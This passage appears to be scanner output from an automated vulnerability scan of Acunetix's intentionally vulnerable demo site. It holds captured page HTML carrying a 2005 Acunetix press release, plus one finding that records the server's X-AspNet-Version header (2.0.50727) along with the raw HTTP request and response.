{ theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3707 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,707 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi%2FTB7mR4IysbuEg0lOgmHIs
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 